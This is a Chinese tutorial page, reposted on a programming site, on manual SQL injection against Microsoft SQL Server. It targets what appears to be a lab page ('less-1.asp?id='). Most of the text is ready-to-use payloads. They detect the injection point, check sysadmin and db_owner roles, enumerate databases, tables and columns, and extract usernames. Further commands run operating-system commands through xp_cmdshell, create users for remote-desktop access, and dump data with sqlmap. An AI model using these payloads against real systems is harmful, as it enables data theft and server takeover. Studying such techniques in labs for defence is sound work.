AI导航网
微信公众号搜"智元新知"关注
微信扫一扫可直接关注哦!

MSSQL手工注入

分类:MsSQL作者:编程之家原文地址

一、手工注入

Step1:检测注入点

  通过payload检测   

  http://……/less-1.asp?id=1' and 1=1--

  http://……/less-1.asp?id=1' and 1=2--

Step2:判断数据库类型

  select * from sysobjects   (sysobjects 系统对象表,保存当前数据库的对象)

  select * from users where id=1 and exists(select * from sysobjects)    有结果说明该数据库是mssql

  http://……/less-1.asp?id=1' union select * from users where id=1 and exists(select * from sysobjects)--

Step3:注入点权限的判断(根据页面显示效果

  select IS_SRVROLEMEMBER('sysadmin'); 判断当前是否为sa

  http://……/less-1.asp?id=1' and (select IS_SRVROLEMEMBER('sysadmin'))>0--

  select is_srvrolemember('db_owner'); 判断当前用户文件、读文件的权限(db_owner)

  http://……/less-1.asp?id=1' and (select IS_SRVROLEMEMBER('db_owner'))>0--

  select is_srvrolemember('public');判断是否有public权限,可以爆破表

  http://……/less-1.asp?id=1' and (select IS_SRVROLEMEMBER('public'))>0--

Step4:信息收集

  1‘ and (user)=1--

  当前数据库版本: select @@version    = 1  报错

  http://……/less-1.asp?id=1' and (select @@version)=1--

  当前用户:   user

  http://……/less-1.asp?id=1' and (user)=1--

  当前数据库:    select db_name()     

  http://……/less-1.asp?id=1' and (select db_name())=1--

    db_name(0) 当前数据库,其中的参数表示第几个数据库

    SELECT top 1 Name FROM Master..SysDatabases where name not in ('master','aspcms'); 

      SELECT top 1 Name FROM Master..SysDatabases  在系统数据库中能够查询所有的数据库

      where name not in ('master','aspcms')    表示查找的结果不在括号中的集合中

Step5:当前数据库中的表

  select top 1 name from test.sys.all_objects where type='U' and is_ms_shipped=0    获取一个表名

  http://……/less-1.asp?id=1' and (select top 1 name from test.sys.all_objects where type='U' and is_ms_shipped=0)=1--

  select top 1 name from test.sys.all_objects where type='U' and is_ms_shipped=0 and name not in ('emails')   第二个表名

  http://……/less-1.asp?id=1' and (select top 1 name from test.sys.all_objects where type='U' and is_ms_shipped=0 and name not in ('emails'))=1--

Step6:获取指定表的字段名

  select top 1 column_name from test.@R_582_4045@ion_schema.columns where table_name='users'   获取一个字段

  http://……/less-1.asp?id=1' and (select top 1 column_name from test.@R_582_4045@ion_schema.columns where table_name='users')=1--

  select top 1 column_name from test.@R_582_4045@ion_schema.columns where table_name='users' and column_name not in ('id')   第二个字段

  http://……/less-1.asp?id=1' and (select top 1 column_name from test.@R_582_4045@ion_schema.columns where table_name='users' and column_name not in ('id'))=1--

Step7:获取字段的数据

  select top 1 username from users

  http://……/less-1.asp?id=1' and (select top 1 username from users)=1--

Step8:解密数据,登录后台

 

二、MSsql的 xp_cmdshell 模块

  select count(*) FROM master. dbo.sysobjects Where xtype ='X' AND name = 'xp_cmdshell'

  exec master..xp_cmdshell 'whoami'    //执行系统命令

  http://………….asp?id=1';exec master..xp_cmdshell 'whoami'--    //不显示执行结果

  如果想看到执行命令之后的结果:需要创建一个临时表,将执行结果写进去,最后再读

  也可以直接通过命令创建用户,通过远程桌面登录目标计算机

 

三、使用sqlMAP对MSsql注入漏洞进行利用

  sqlmap.py -u “target_url” -dbs mssql --dump --force-pivoting

 

 

  

 

版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 [email protected] 举报,一经查实,本站将立刻删除。

相关推荐

SQL Server CASE WHEN ... THEN ... ELSE ... END
SELECT a.*,b.dp_name,c.pa_name,fm_name=(CASE WHEN a.fm_no='LJCG001H' THEN dbo.ELTPNAME(a.fw_nu) ELSE d.fm_name END),e.fw_state_nm,f.fw_rmk_nm
SQL Server 数据表栏位新增
if not exists(select name from syscolumns where name='tod_no' and id=object_id('iebo09d12')) alter table iebo09d12 add tod_no varchar(
SQL Server Left join
select a.*,pano=a.pa_no,b.pa_name,f.dp_name,e.fw_state_nm,g.fa_name from LJSS007H a (nolock) Left join LJPA002H b (nolock) On a.pa_no =b.pa_no Left jo
SQL Server 2019 中设置定时自动重启
要在 SQL Server 2019 中设置定时自动重启,可以使用 Windows 任务计划程序。下面是详细的步骤: 步骤一:创建批处理文件 打开记事本。 输入以下内容: net stop "SQL Server (MSSQLSERVER)" net ...
SQL Server 事务日志已满
您收到的错误消息表明数据库 'EastRiver' 的事务日志已满,导致数据库操作失败。要解决这个问题,可以按照以下步骤操作: 1. 备份事务日志首先,备份事务日志以释放空间: BACKUP LOG [EastRiver] T...
SQL SERVER PROFILER
首先我需要查询出需要使用SQL Server Profiler跟踪的数据库标识ID,若不知道怎么查询数据库的标识ID, 打开SQL Server management studio,点击工具。选择SQL Server Profiler。 登录,登录成功后,如果有个默认弹窗,...
SQL Server:User, group, or role 'iemis' already exists in the current database.
--最新的解决方法 --先创建用户帐户,不进行授权,然后通过下面的SQL语句将该用户帐户关联至对应的数据库用户。优点是避免了重新授权的操作。 USE tempdbEXEC sp_change_users_login 'Update_One', ...
SQL Server2019 新增字段并设置默认值
命令: ALTER TABLE 表名 add 列名 数据类型 default 默认值 not null 例如: ALTER TABLE LJEL005H add el_req int default 15 not null
SQL 尚未定义空闲 CPU 条件
     
sql 流水号的递增
declare @i int set @i=340 while @i<415 begin set @i=@iʱ insert into LJWK007H select '2024','28','9110','3PTSD621000000
    pythonJavaScriptjavaHTMLreactjsC#AndroidCSSNode.jssqlrpython-3.xMysqLjQueryc++pandasFlutterangularIOSdjangolinuxswifttypescript路由器JSON路由器设置无线路由器h3c华三华三路由器设置华三路由器电脑软件教程arraysdocker软件图文教程Cvue.jslaravelspring-bootreact-native